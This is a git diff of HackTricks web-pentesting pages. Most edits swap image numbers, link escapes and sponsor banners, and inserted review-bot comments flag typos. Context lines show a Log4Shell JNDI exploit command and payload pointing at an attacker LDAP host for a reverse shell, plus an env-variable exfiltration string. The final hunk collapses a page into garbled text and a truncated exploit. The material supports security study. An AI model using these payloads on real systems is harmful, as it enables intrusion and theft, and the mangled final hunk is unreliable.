-![https://miro.medium.com/v2/resize:fit:720/format:webp/1\*rolEK39-DDxeBgSq6KLKAA.png](<../.gitbook/assets/image (281).png>)
+![https://miro.medium.com/v2/resize:fit:720/format:webp/1\*rolEK39-DDxeBgSq6KLKAA.png](<../.gitbook/assets/image (284).png>)
### From XSS inside a subdomain
@@ -291,7 +291,7 @@ To better understand and mitigate this vulnerability, you can use the BurpSuite
Try to add a **`callback`** **parameter** in the request. Maybe the page was prepared to send the data as JSONP. In that case the page will send back the data with `Content-Type: application/javascript` which will bypass the CORS policy.
-![](<../.gitbook/assets/image (853).png>)
+![](<../.gitbook/assets/image (856).png>)
### Easy (useless?) bypass
@@ -355,7 +355,7 @@ This technique leverages the behavior of browsers when multiple IP addresses are
Note that in order to access localhost you should try to rebind **127.0.0.1** in Windows and **0.0.0.0** in linux.\
Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0"
-
+
{% endhint %}
For more info you can check [https://unit42.paloaltonetworks.com/dns-rebinding/](https://unit42.paloaltonetworks.com/dns-rebinding/)
@@ -402,8 +402,7 @@ You can find more information about the previous bypass techniques and how to us
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration)
* [https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b](https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b)
-
-
+
{% embed url="https://websec.nl/" %}
diff --git a/pentesting-web/crlf-0d-0a.md b/pentesting-web/crlf-0d-0a.md
index 2f77911fe..7816ef410 100644
--- a/pentesting-web/crlf-0d-0a.md
+++ b/pentesting-web/crlf-0d-0a.md
@@ -177,11 +177,11 @@ If a platform is taking **data from an HTTP request and using it without sanitiz
For example, in the original discovered vuln, cache keys were used to return the IP and port a user shuold connect to, and attackers were able to **inject memcache comands** that would **poison** the **cache to send the vistims details** (usrnames and passwords included) to the attacker servers:
-
+
Moreover, researchers also discovered that they could desync the memcache responses to send the attackers ip and ports to users whose email the attacker didn't know:
-
+
### How to Prevent CRLF / HTTP Header Injections in Web Applications
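Review bot: the sentence kept as context above the first changed figure has several typos ("shuold", "comands", "vistims", "usrnames") that make the memcache poisoning description harder to follow. The hunk only swaps the two figure lines, so please fix the wording to "should", "commands", "victims' details" and "usernames" in the same change.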
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index 7db71d1b9..6faeb47c1 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -45,7 +45,7 @@ To exploit a CSRF vulnerability, several conditions must be met:
You could **capture the request in Burp** and check CSRF protections and to test from the bowser you can click on **Copy as fetch** and check the request:
-
+
### Defending Against CSRF
@@ -623,7 +623,7 @@ with open(PASS_LIST, "r") as f:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
diff --git a/pentesting-web/dependency-confusion.md b/pentesting-web/dependency-confusion.md
index 06dc9e4d8..0c2e10a72 100644
--- a/pentesting-web/dependency-confusion.md
+++ b/pentesting-web/dependency-confusion.md
@@ -12,7 +12,7 @@
-
+
{% embed url="https://websec.nl/" %}
@@ -56,7 +56,7 @@ In the [**original post about dependency confusion**](https://medium.com/@alex.b
* [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
* [https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)
-
+
{% embed url="https://websec.nl/" %}
diff --git a/pentesting-web/deserialization/README.md b/pentesting-web/deserialization/README.md
index 83ec3a38b..cd8737125 100644
--- a/pentesting-web/deserialization/README.md
+++ b/pentesting-web/deserialization/README.md
@@ -246,9 +246,9 @@ You can see in the example that when a function is serialized the `_$$ND_FUNC$$_
Inside the file `node-serialize/lib/serialize.js` you can find the same flag and how the code is using it.
-![](<../../.gitbook/assets/image (348).png>)
+![](<../../.gitbook/assets/image (351).png>)
-![](<../../.gitbook/assets/image (443).png>)
+![](<../../.gitbook/assets/image (446).png>)
As you may see in the last chunk of code, **if the flag is found** `eval` is used to deserialize the function, so basically **user input if being used inside the `eval` function**.
@@ -642,9 +642,9 @@ Find whats is **JNDI Injection, how to abuse it via RMI, CORBA & LDAP and how to
There are several products using this middleware to send messages:
-![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../.gitbook/assets/image (311).png>)
+![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../.gitbook/assets/image (314).png>)
-![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../.gitbook/assets/image (1053).png>)
+![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../.gitbook/assets/image (1056).png>)
### Exploitation
diff --git a/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
index c353b38ec..4732f496c 100644
--- a/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
+++ b/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
@@ -26,19 +26,19 @@ The **System.Windows.Data** namespace, found within the **PresentationFramework.
Using [**dnSpy**](https://github.com/0xd4d/dnSpy) you can **inspect the code** of the class we are interested in. In the image below we are seeing the code of **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**
-![](<../../.gitbook/assets/image (424).png>)
+![](<../../.gitbook/assets/image (427).png>)
As you can observe when `MethodName` is set `base.Refresh()` is called, lets take a look to what does it do:
-![](<../../.gitbook/assets/image (316).png>)
+![](<../../.gitbook/assets/image (319).png>)
Ok, lets continue seeing what does `this.BeginQuery()` does. `BeginQuery` is overridden by `ObjectDataProvider` and this is what it does:
-![](<../../.gitbook/assets/image (342).png>)
+![](<../../.gitbook/assets/image (345).png>)
Note that at the end of the code it's calling `this.QueryWorke(null)`. Let's see what does that execute:
-![](<../../.gitbook/assets/image (593).png>)
+![](<../../.gitbook/assets/image (596).png>)
Note that this isn't the complete code of the function `QueryWorker` but it shows the interesting part of it: The code **calls `this.InvokeMethodOnInstance(out ex);`** this is the line where the **method set is invoked**.
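Review bot: the context line before the last image names the method `this.QueryWorke(null)`, while the paragraph that follows calls it `QueryWorker`; fix the spelling while the neighbouring lines are being edited. All four renumbered images in this hunk are decompiled-code screenshots with empty alt text (`![](...)`), and the prose depends on them ("In the image below we are seeing the code"), so give each a descriptive alt text or replace the screenshots with fenced code excerpts, so the walkthrough does not break on the next asset renumbering.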
diff --git a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
index bf1183cc3..3c77a4070 100644
--- a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
+++ b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
@@ -178,7 +178,7 @@ The **extension** has **passive** and active **capabilities**.
By default it **checks passively** all the requests and responses sent **looking** for **Java serialized magic bytes** and will present a vulnerability warning if any is found:
-![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/image (762).png>)
+![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/image (765).png>)
### Active
diff --git a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
index da84d286c..16b6ba4d4 100644
--- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
+++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -51,7 +51,7 @@ Despite protections, vulnerabilities remain, mainly due to the lack of safeguard
### JNDI Example
-![](<../../.gitbook/assets/image (1019).png>)
+![](<../../.gitbook/assets/image (1022).png>)
Even if you have set a **`PROVIDER_URL`**, you can indicate a different one in a lookup and it will be accessed: `ctx.lookup("")` and that is what an attacker will abuse to load arbitrary objects from a system controlled by him.
@@ -90,7 +90,7 @@ In case you can **make an app resolve a JNDI LDAP UR**L, you can control the LDA
#### Deserialization exploit
-![](<../../.gitbook/assets/image (272).png>)
+![](<../../.gitbook/assets/image (275).png>)
The **exploit is serialized** and will be deserialized.\
In case `trustURLCodebase` is `true`, an attacker can provide his own classes in the codebase if not, he will need to abuse gadgets in the classpath.
@@ -99,7 +99,7 @@ In case `trustURLCodebase` is `true`, an attacker can provide his own classes in
It's easier to attack this LDAP using **JavaFactory references**:
-![](<../../.gitbook/assets/image (1056).png>)
+![](<../../.gitbook/assets/image (1059).png>)
## Log4Shell Vulnerability
@@ -353,7 +353,7 @@ Use [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) to generat
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
```
-![](<../../.gitbook/assets/image (1115).png>)
+![](<../../.gitbook/assets/image (1118).png>)
Now you can easily use a generated JNDI link to exploit the vulnerability and obtain a **reverse shell** just sending to a vulnerable version of log4j: **`${ldap://10.10.14.10:1389/generated}`**
@@ -419,13 +419,13 @@ As seen in this page in [**previous payloads**](jndi-java-naming-and-directory-i
In the CTF, you **couldn't access the stderr** of the java application using log4J, but Log4J **exceptions are sent to stdout**, which was printed in the python app. This meant that triggering an exception we could access the content. An exception to exfiltrate the flag was: **`${java:${env:FLAG}}`.** This works because **`${java:CTF{blahblah}}`** doesn't exist and an exception with the value of the flag will be shown:
-![](<../../.gitbook/assets/image (1020).png>)
+![](<../../.gitbook/assets/image (1023).png>)
### Conversion Patterns Exceptions
Just to mention it, you could also inject new [**conversion patterns**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) and trigger exceptions that will be logged to `stdout`. For example:
-![](<../../.gitbook/assets/image (680).png>)
+![](<../../.gitbook/assets/image (683).png>)
This wasn't found useful to exfiltrate date inside the error message, because the lookup wasn't solved before the conversion pattern, but it could be useful for other stuff such as detecting.
diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
index 0eca2b52d..522a23fde 100644
--- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
+++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
@@ -91,11 +91,11 @@ Check this writeup: [https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challe
* **sanitize-html**
-
+
* **dompurify**
-
+
* **Closure**
diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
index 1d52fcfc6..063b239f2 100644
--- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
+++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
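Review bot: the added line escapes the underscore inside the link destination (`https://twitter.com/hacktricks\_live`), not only in the link text. Escaping the visible label `@hacktricks\_live` is harmless, but a backslash in the URL resolves correctly only if the renderer processes backslash escapes in link destinations, so keep the destination as `https://twitter.com/hacktricks_live`. The same commit removes `\_` and `\&` escapes from the Trickest URLs, so the two changes pull in opposite directions.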
@@ -26,11 +26,11 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Serve XSS responses
-**For further details [take a look to the original reserach](https://portswigger.net/research/server-side-prototype-pollution)**
+**For further details** [**take a look to the original reserach**](https://portswigger.net/research/server-side-prototype-pollution)
### Change JSON content-type to HTML
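Review bot: the rewritten link line keeps the misspelling `reserach` and the phrasing `take a look to`; since the line is being replaced anyway, make it `take a look at the original research`. The `---` to `***` change is purely cosmetic, so apply it across every page or not at all.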
@@ -148,10 +148,9 @@ You could definitely use it in a bug **chain** to exploit a **prototype pollutio
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
-
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -170,7 +169,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
\ No newline at end of file
+
diff --git a/pentesting-web/deserialization/python-yaml-deserialization.md b/pentesting-web/deserialization/python-yaml-deserialization.md
index b51a575a5..b6bbce109 100644
--- a/pentesting-web/deserialization/python-yaml-deserialization.md
+++ b/pentesting-web/deserialization/python-yaml-deserialization.md
@@ -38,7 +38,7 @@ print(yaml.dump(range(1,10)))
Check how the **tuple** isn’t a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins).
-![](<../../.gitbook/assets/image (1037).png>)
+![](<../../.gitbook/assets/image (1040).png>)
**safe\_load()** or **safe\_load\_all()** uses SafeLoader and **don’t support class object deserialization**. Class object deserialization example:
diff --git a/pentesting-web/domain-subdomain-takeover.md b/pentesting-web/domain-subdomain-takeover.md
index c093c4ee7..bd632a8d3 100644
--- a/pentesting-web/domain-subdomain-takeover.md
+++ b/pentesting-web/domain-subdomain-takeover.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=domain-subdomain-takeover) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=domain-subdomain-takeover" %}
## Domain takeover
@@ -103,13 +103,13 @@ For cloud providers, verifying domain ownership is crucial to prevent subdomain
* [https://0xpatrik.com/subdomain-takeover/](https://0xpatrik.com/subdomain-takeover/)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=domain-subdomain-takeover) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=domain-subdomain-takeover" %}
diff --git a/pentesting-web/email-injections.md b/pentesting-web/email-injections.md
index 1b2dc2e09..1f0d13a0d 100644
--- a/pentesting-web/email-injections.md
+++ b/pentesting-web/email-injections.md
@@ -1,12 +1,12 @@
# Email Injections
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
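Review bot: the new text link in this file has no `utm_term` parameter, while the equivalent text link added to `domain-subdomain-takeover.md` in this same commit carries `utm_term=trickest`; pick one parameter set for text links and use it on every page. The split between `utm_medium=text` on the inline link and `utm_medium=banner` on the embed is consistent across both files, so only `utm_term` needs aligning.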
@@ -108,11 +108,11 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i
### Whitelist bypass
-
+
### Quotes
-
+
### IPs
@@ -123,7 +123,7 @@ You can also use IPs as domain named between square brackets:
### Other vulns
-![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1128).png>)
+![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
## Third party SSO
@@ -173,10 +173,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md
index ad4645824..43cd19d65 100644
--- a/pentesting-web/file-inclusion/README.md
+++ b/pentesting-web/file-inclusion/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -485,7 +485,7 @@ Similarly, for executing arbitrary system commands, one might use:
It's important to **URL-encode these payloads**.
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -705,7 +705,7 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
**I don't know how is this useful but it might be.**\
_Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
-
+
## References
@@ -714,7 +714,7 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md b/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
index 14ac7c11a..c668a6e1e 100644
--- a/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
+++ b/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
@@ -1,4 +1,4 @@
-
+# LFI2RCE Via compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Path Disclosure
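Review bot: the new H1 spells the flag `PHP\_STREAM\_PREFER\_STUDIO`, but the section heading further down in this file, and the php-src flag it describes, is `PHP_STREAM_PREFER_STDIO`. The title appears to have been generated from the misspelled file name; use `STDIO` in the heading and consider renaming the file in a follow-up.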
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
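Review bot: the link label on the changed line reads `@carlospolopm` while its destination is `https://twitter.com/hacktricks\_live`, and the other files in this commit label the same URL `@hacktricks\_live`; align the label with the target instead of only re-escaping the URL. In the same hunk `### [WhiteIntel]` is demoted to `####`, which follows from the new H1 in this file, but the other pages in this commit keep that sponsor heading at `###`, so confirm the nesting is intended.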
@@ -26,9 +26,9 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
-## `compress.zlib://` and `PHP_STREAM_PREFER_STDIO`
+### `compress.zlib://` and `PHP_STREAM_PREFER_STDIO`
A file opened using the protocol `compress.zlib://` with the flag `PHP_STREAM_PREFER_STDIO` can continue writing data that arrives to the connection later to the same file.
@@ -52,7 +52,7 @@ You can see that info in this part of the php-src code in main/streams/cast.c:
}
```
-## Race Condition to RCE
+### Race Condition to RCE
[**This CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) was solved using the previous trick.
@@ -66,9 +66,9 @@ However, there is a check in the web server that **prevents loading files that c
For more information check the description of the Race Condition and the CTF in [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -87,9 +87,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md b/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
index 3e3a617aa..73c6779e0 100644
--- a/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
+++ b/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
@@ -102,7 +102,7 @@ Then, the attacker could use those **100 connections** to perform a **search bru
Yes, it's possible to generate 100000 temporary files in an EC2 medium size instance:
-
+
{% hint style="warning" %}
Note that in order to trigger the timeout it would be **enough to include the vulnerable LFI page**, so it enters in an eternal include loop.
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md b/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
index 5192f8b74..89a094090 100644
--- a/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
+++ b/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -26,276 +26,38 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Vulnerable configuration
-**[Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
+[**Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
* PHP code:
-````h`
- /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` Note: One cannot directly include \`/proc/34/fd/15\` in this example as PHP's \`include\` function would resolve the path to \`/var/lib/nginx/body/0000001368 (deleted)\` which doesn't exist in in the filesystem. This minor restriction can luckily be bypassed by some indirection like: \`/proc/self/fd/34/../../../34/fd/15\` which will finally execute the content of the deleted \`/var/lib/nginx/body/0000001368\` file. ## Full Exploit \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # find nginx worker processes r = requests.get(URL, 